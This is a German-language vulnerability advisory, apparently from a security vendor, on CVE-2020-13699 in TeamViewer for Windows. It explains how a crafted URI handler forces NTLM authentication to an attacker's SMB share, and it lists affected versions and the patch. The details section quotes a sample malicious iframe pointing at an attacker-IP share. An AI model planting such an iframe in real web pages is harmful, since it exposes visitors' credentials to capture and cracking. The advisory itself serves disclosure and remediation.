Eine hochriskante Sicherheitslücke wurde in TeamViewer für Windows gefunden. Sie wird als „CVE-2020-13699“ mit einem CVSS-Basis-Score von „8.8“ geführt und könnte von Angreifern ausgenutzt werden, um das Passwort von Nutzern zu knacken und daraufhin das System weiter auszunutzen.

TeamViewer ist eine Softwareanwendung für Fernsteuerung, Desktop-Sharing, Online-Meetings, Webkonferenzen und Dateitransfer zwischen Computern, die von dem deutschen Unternehmen TeamViewer GmbH entwickelt wurde. TeamViewer ist für die Betriebssysteme Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 und BlackBerry verfügbar. Es ist auch möglich, mit einem Webbrowser auf ein System zuzugreifen, auf dem TeamViewer läuft.

Die Nutzung von Remote-Connectivity-Softwareanwendungen hat in letzter Zeit zugenommen, was auf die jüngste COVID-19-Pandemie zurückzuführen ist, bei der von zu Hause aus gearbeitet wird.

(CVE-2020-13699) Details zur Schwachstelle:

• CVE-2020-13699 ist eine Sicherheitslücke, die von einem nicht zitierten Suchpfad oder -element herrührt. Konkret ist diese Schwachstelle darauf zurückzuführen, dass die Anwendung ihre benutzerdefinierten URI-Handler nicht korrekt zitiert.

• Ein Benutzer mit einer installierten verwundbaren TeamViewer-Version wird dazu verleitet, eine bösartig gestaltete Website zu besuchen, um diese Schwachstelle auszunutzen.

• Laut Jeffrey Hofmann, Sicherheitsingenieur bei Praetorian, der die Schwachstelle entdeckt und veröffentlicht hat, „kann ein Angreifer einen bösartigen iframe in eine Website mit einer manipulierten URL einbetten (iframe src=’teamviewer10: -play \\attacker-IP\share\fake.tvs‘), der den TeamViewer-Windows-Desktop-Client startet und ihn zwingt, eine entfernte SMB-Freigabe zu öffnen.“
• Windows führt beim Öffnen der SMB-Freigabe eine NTLM-Authentifizierung durch. Diese Anfrage kann weitergeleitet werden, d.h. ein Angreifer kann eine Authentifizierung abfangen und an einen anderen Server senden, was ihm die Möglichkeit gibt, Operationen auf dem entfernten Server mit den Rechten des authentifizierten Benutzers durchzuführen.
• Eine erfolgreiche Ausnutzung dieser Schwachstelle könnte es einem entfernten Angreifer ermöglichen, TeamViewer mit beliebigen Parametern zu starten. Die Anwendung könnte gezwungen werden, eine NTLM-Authentifizierungsanfrage an das System des Angreifers weiterzuleiten, was Offline-Regenbogentabellen-Angriffe und Brute-Force-Knackversuche ermöglicht.

• Diese Angriffe könnten zu einer zusätzlichen Ausnutzung führen, da durch die erfolgreiche Ausnutzung der Schwachstelle Anmeldeinformationen gestohlen werden.

Die Offenlegung deutet darauf hin, dass es keine Beweise für die Ausnutzung dieser Schwachstelle gibt.

Nach Angaben des CIS ist das Risiko einer Ausnutzung für Regierungseinrichtungen und mittelständische Unternehmen hoch. Bei kleinen Unternehmen ist das Risiko mittel und bei Privatanwendern gering.

Auswirkung
Die Ausnutzung der Schwachstellen könnte es entfernten Angreifern ermöglichen, vertrauliche Anmeldeinformationen zu erhalten oder die vollständige Kontrolle über das betroffene System zu übernehmen.

Betroffene Produkte
TeamViewer Windows Desktop Application vor 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 und 15.8.3.

Lösung
TeamViewer hat ein Sicherheitsupdate veröffentlicht, das die Sicherheitslücke CVE-2020-13699 behebt.

SanerNow-Sicherheitsinhalte zur Erkennung und Behebung dieser Sicherheitslücke sind veröffentlicht. Wir empfehlen dringend, das Sicherheitsupdate gemäß den Anweisungen in unserem Support-Artikel anzuwenden.